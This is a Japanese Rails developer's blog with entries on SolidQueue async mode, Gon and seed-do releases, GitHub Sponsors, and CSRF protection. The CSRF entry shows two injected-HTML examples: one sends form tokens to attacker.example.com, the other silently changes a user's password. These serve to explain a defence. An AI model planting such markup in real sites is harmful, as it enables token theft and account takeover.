おもしろwebサービス開発日記

Ruby や Rails を中心に、web技術について書いています

株式会社ウィルネットは設立9周年を迎えました

2月21日は弊社の設立記念日でした。もう会社運営も10年目。時間が過ぎるのはあっという間ですね…。

去年のエントリはこちら:

blog.willnet.in

法人9年目を振り返る

2025年の弊社(僕)の活動を振り返ると、OSS活動をよくやっていた印象があります。仕事の関係で見ていたライブラリのメンテが滞っていて仕方ないから直すか〜というのを繰り返していたらいつの間にかメンテナになっていたりしました。AI AgentのおかげでコミットメッセージやPRの英語に困らなくなったというのが要因として大きい気がします。

メンテされないgemの向き合い方についてfindyさんに寄稿したりもしました。

findy-code.io

あとはブログのエントリ数が2024年の倍以上あるのでまあまあアウトプットを頑張っていそう。お仕事の一環で僕が新しく知ったり学んだりした情報を共有するというのを継続してやっていて、そこでのアウトプットで満足してパブリックな状態にはせずにいたのですがやっぱりパブリックにもした方がいいよね、ということで時間や気力的に可能な分だけ公にしています。特にRails8.1のマイナーフィーチャーをまとめました みたいなやつがパブリックになっていると自分でも便利なのでもっとやっていきたい(時間があれば…)。

最近はAI Agentのおかげで時間がない中でもちょっとしたタスクを進めることができて楽しいです。仕事もプライベートもなんやかんやで忙しいのですが、顧問先に関しては週1日程度分を募集しています。興味ある方はお声がけください。

10年目も健康に気をつけつつ頑張っていきます (( ⁰⊖⁰)/)

ginza.rb 第95回を開催してRuby4.0について学んだ

Ginza.rb 第95回 - Ruby4.0について学ぶぞ - connpass

第95回はRuby4.0について学びました。ko1さんやmameさん、hsbtさんが書いてくれた資料を参考にみんなでわいわいしました。

感想

個人的にはRuby::Boxがどう自分たちの生活を変えていくのか、というのに興味があります。

例えば boxwerkのように、Ruby::Boxでパッケージを分けることでパッケージ間の疎結合を強制させるであるとか、Ruby::Box: Rethinking Code Reloading with Isolated Namespaces | Ruby Elders で書かれているような、アプリケーションのリロードをRuby::Boxを都度作り直すことで実現するとか。

Ruby::Boxが実際に我々の手元で動くようになったことで夢が広がりつつあるのを感じます。

次回

次回は3月13日(金)開催予定です。fizzyのソースコードリーディングをします。興味のある方はぜひご参加ください。

Ginza.rb 第96回 - Fizzyソースコードリーディング - connpass

SolidQueueがスレッドでも動くようになった

最近個人的にバックグラウンドワーカーとしてSolidQueueを使う機会が少しずつ増えています。そんな折SolidQueueのv1.3.0がリリースされたのですが、その中に個人的に興味深い機能が入ったので紹介しておきます。

前提

SolidQueueには複数の役割が定義されています。

  • Supervisor
  • Dispatcher
  • Scheduler
  • Worker

SolidQueueは開発初期では それぞれの役割がスレッドとして1プロセス内でも動くasync modeが用意されていました

が、実装をシンプルにするためにv0.4.0以降はasync modeが廃止され、各役割ごとに1以上のプロセスを割り当てるようになっています

SolidQueueはメモリ消費量がSidekiqよりも多かった

各役割ごとにプロセスが割り当てられるため、SolidQueueを利用する際には最低限の構成でも3〜4プロセス作られることになります*1。Sidekiqは1プロセスで動くので、Sidekiqだと問題ないサーバでもSolidQueueだとメモリが厳しいことが起こります。

ぼくもHerokuで512MBメモリのdynoを利用しworkerを運用していたのですが、SidekiqからSolidQueueへ移行する際にはメモリが足らず1GBメモリのdynoにアップグレードせざるを得ませんでした。

Railsは個人開発者が安いVPSを借りて簡単にデプロイし運用することができ大変便利なのですが、SolidQueueを利用する場合、メモリに関してはある程度大きめなもの(2GB〜)が必要になっていました。

async modeの復活

このメモリ消費量の問題で、async modeの復活をしたいという人が現れました。メモリ消費量を減らしたい!という要望だけではなかなか物事が前に進まなかったのですが、これまでforkが使えないのでSolidQueueを利用できなかったJRubyやWindows環境の人もSolidQueueを使えるようにしたい、というところで話が前に進んだようです。

そしてついにasync modeを復活させるPR がマージされました。このコミットは先日リリースされたv1.3.0に含まれています。

bin/jobs --asyncで起動するか、SOLID_QUEUE_SUPERVISOR_MODE=asyncとするとasync modeを利用するようになります。

READMEに次のように書かれているので、基本的にはプロセス(fork)を使う方が挙動が安定しそうですが、個人開発など限られた環境で使う分には便利ではないでしょうか。

The recommended and default mode is fork. Only use async if you know what you're doing and have strong reasons to

僕の環境でも600MBを超えていたメモリ消費量を260MBくらいまでに減らすことができました。やったね。

*1:Schedulerはrecurring jobが必要なければ使わない

Gonのv7.0.0をリリースしました

github.com

メジャーバージョンアップであることからもわかるように、非互換な変更が入っています。この日互換な変更は@krororoさんが作ってくれた次のPRによるものです。

Breaking: Make request_store an optional dependency by krororo · Pull Request #296 · gazay/gon

gonは、gon.foo = 'bar'のように値をセットすると、内部でrequest_storeを使って値を格納していました。昔のRailsアプリケーション開発において、リクエストごとに自動でリセットされるグローバルな値を利用したい時はrequest_storeがほぼ唯一の選択肢だったように思います。しかしRails5.2からはRails公式の機能であるActiveSupport::CurrentAttributes を利用できるようになっています。上記のPRはrequest_storeの依存を消してActiveSupport::CurrentAttributesを利用するためのものです。

何が嬉しいのか

安定性が増すと思っています。現時点でのrequest_storeは内部でファイバーローカル変数が使われています。このためリクエスト処理中にFiberを使うコードがあるとgonの挙動はおかしくなる可能性があります。

ファイバーローカル変数って何?という人はこちらを参照してください。

Thread.current[:hoge]はスレッドローカル変数を参照していると思いきや実際はファイバーローカル変数だった - おもしろwebサービス開発日記

ActiveSupport::CurrentAttributesも登場時はファイバーローカル変数を利用していました。しかしRails7.0からは自分が利用しているサーバの種類に合わせてファイバーローカルとスレッドローカルを切り替えられるようになり現在に至っています。

そのため現時点では、Rails7.0以上を利用しているのであればActiveSupport::CurrentAttributesを利用したほうが安定するはず。ということでこのPRをマージしました。

懸念点

gonを利用しているユーザの大半は自分がrequest_storeを使っているのかActiveSupport::CurrentAttributesを使っているのか特に意識することはないと思います。そのためRails5.2以上を利用していてActiveSupport::CurrentAttributesを利用できるのであればそれを利用し、そうでない場合は明示的にgem 'request_store'をGemfileに書いてもらうという仕様にしました。

最近のRailsでrequest_storeを明示的に使いたいケースはほぼないと思いこのようにしたのですが、もし不都合があったらぜひ教えてほしいです。

GitHub Sponsorsを始めました

始めてみました。

github.com

ここ最近はseed-fuをforkしたりgonのメンテナになったりSorceryのメンテナになったりと、メンテが滞っているライブラリの手助けをすることが増えてきました。あとCIが整っていないライブラリを見つけたら直すというのをちょくちょくやっています。

メンテされないgemとどう向き合うか。“普通のOSS開発者” willnetさんの取り組み - Findy Media | IT/Webエンジニアの転職・求人サイトFindy – GitHubからスキル偏差値を算出 にもCI改善の話を書きました。

僕はこれらのgemを直接自分では使っていない事が多いです。お手伝い先が使っていることがモチベーションになっていますが、将来的にお手伝い先がそのgemを使わなくなったらどうでしょう?僕は自分のメンテナンスしているライブラリが最新のRubyやRailsで動かなくなるのは絶対嫌なのでメンテナンスが止まることはない*1と思いますが、モチベーションは少し下がりそうです。

でも僕のメンテナンスしているライブラリを直接使っている他の人や会社が応援してくれたらもっとやる気が出そうだな、と思ったのでGitHub Sponsorsを始めてみました。

OSSの継続可能性について考えている

GitHub Sponsorsを始めたのにはもう一つ理由があって、それは「GitHub Sponsorsが備えている機能を使ってみたかった」です。

メンテが滞っているライブラリの手助けをするなかで、もっとOSSエコシステムをいい感じにできんもんかな、というのを時折考えます。例えば人気のOSSライブラリをメンテナンスしているひとにお金がちょっとでも入ってきたらメンテナンスが滞ることも減るんじゃないかなと思うのですが、現状そうなってはいません。

GitHub Sponsorsは我々開発者にとって一番身近な寄付の手段であるので、スポンサーを受ける側としてどういう機能があって、どのような手法で寄付を募ることができるのかを実際に使ってみることで知りたかったのでした。

実際に始めてみると、寄付してくれた人限定でprivateリポジトリの招待ができたり、ニュースレターを遅れたりする機能があるのを見つけました。なので

  • 毎月10ドル以上のスポンサーに活動報告を送ります
  • 毎月100ドル以上のスポンサーに公開前のOSSライブラリを閲覧できる権利を付与します

みたいなことはできそうです。実際やるかはさておき、いろんな手段があるのは良いですね。

まとめ

もし@willnetを応援してもいいぞ、という人や企業がいたらスポンサーのほどよろしくお願いします!

github.com

*1:僕が健康でいる限り

seed-do v3.2.0をリリースしました

先程 seed-do v3.2.0をリリースしました。変更内容は内部改善のみです。詳細は以下のリンクからどうぞ。

Release v3.2.0 · willnet/seed-do

seed-doの改善モチベがあがってきた

以前のエントリではseed-doのメンテナンス方針に関して次のように書いていました。

僕はseed-doを直接は使ってないので新規の機能開発に意欲はないのですが、今後も新しいRubyやRailsでちゃんと動くようにするモチベはある

しかしお手伝い先でまあまあヘビーにseed-doを使っているのをみて、seed-doを改善すると改善しただけ開発やテストが捗るだろうな〜という気持ちになってきました。特に速度を改善するとCIが速くなってお財布に優しい。というわけでモチベーションが少しあがってきたので、次カッとなったときに改善しやすいように目についたところを直した、というのがv3.2.0リリースの内情です。

seed-doの速度改善案

seed-doは素朴に一つずつモデルを永続化しているスタイルなので、bulk insertができると速くなるのは間違いなさそうです。なのでSeedDo.bulk_seedのようなメソッドを新設して、そこからseedを実行した場合はbulk insertになるようにしてあげると良いんじゃないかな〜と想像しているところです。ポイントは既存のdb/fixtures/**.rbは一行も変えなくても良いというところ。

しかし今どきAI Agentで機械的な書き換えは比較的容易にできるので、わざわざseed-do側で頑張らなくても各自AI Agentでseed-doをRailsのupsert_allを使う形で置き換えればいいのでは?という気持ちもあります。どうでしょうね。ご意見お待ちしてます。

RailsでCSRFトークンを使うことで防ぐことのできる攻撃について

Rails8.2ではCSRFトークンを使わずにCSRFを防げるようになりそう - おもしろwebサービス開発日記の続きです。前回のエントリではRails8.2からトークンを使わずにCSRFを防ぐ仕組みが入るぞ、という話をしました。偽陽性がかなり減ることが予想されるため、個人的には大歓迎です。

ただ、トークンを利用することで防げる攻撃もあるので100%上位互換というわけではないぞ、という話をこれからします。

前提: Railsはフォームごとに別々のトークンを発行する

Railsはこれまでトークンを利用してCSRF攻撃を検知していました。Rails5.0からはデフォルトでフォームごと*1に別々のトークンを利用されるようになっています。これはconfig.action_controller.per_form_csrf_tokens = trueとするかconfig.load_defaults 5.0以上で有効になっています。

PRはこちら。 Per-form CSRF tokens by btoews · Pull Request #22275 · rails/rails

なぜわざわざフォームごとに別々のトークンが必要なのでしょうか?CSRF攻撃を検知する目的であれば単一のトークンで良いように思えますよね。説明は上記PRに書いているのですが、読むのは大変だと思うので以下に要約しておきます。

フォームごとに別々のトークンを発行することで防ぐことのできる攻撃

まずRailsアプリケーションにXSSの脆弱性が存在することと、CSPが適切に設定されていてXSSからのJavaScriptを実行できなくなっていることが前提となります。JavaScriptが実行できなければXSSの脆弱性があっても安心…というわけではありません。次のような形で攻撃ができてしまいます。<!-- xss -->と書かれた行が攻撃者が追加した文字列です。

<form method="post" action="//attacker.example.com/tokens"><!-- xss -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
 <input type="submit" value="なにかを登録する">
</form>

このように正規のformタグの外側にformタグをネストさせることで、(HTMLとしては不正ですが)攻撃者が用意したURLにformの内容を送信させ、フォームの入力内容やトークンを盗むことができてしまいます。この攻撃自体はCSPのform-action を利用することで防ぐことができます。しかし次のような同一オリジンに対する送信は防ぐことができません。ユーザが送信ボタンを押すと、攻撃者が設定したパスワードに意図せず変更されてしまいます。

<form method="post" action="/user/change_password"><!-- xss -->
<input type="hidden" name="password" value="password"><!-- xss -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
 <input type="submit" value="なにかを登録する">
</form>

フォームごとに異なるトークンを付与することで、この攻撃をActionController::InvalidAuthenticityTokenエラーにするなどして無効にできます。

感想

トークンを使うことで防ぐことのできる攻撃を紹介しました。前提条件がかなり難しいので僕を含む一般的な開発者はそこまで気にしなくていいとは思います(それよりもXSSできないように注意するほうが重要でしょう)。が、こういう攻撃手法もあるんですよという話は知っておいて損はないかと思ったので紹介してみました。

*1:正確には送信先のアクションごと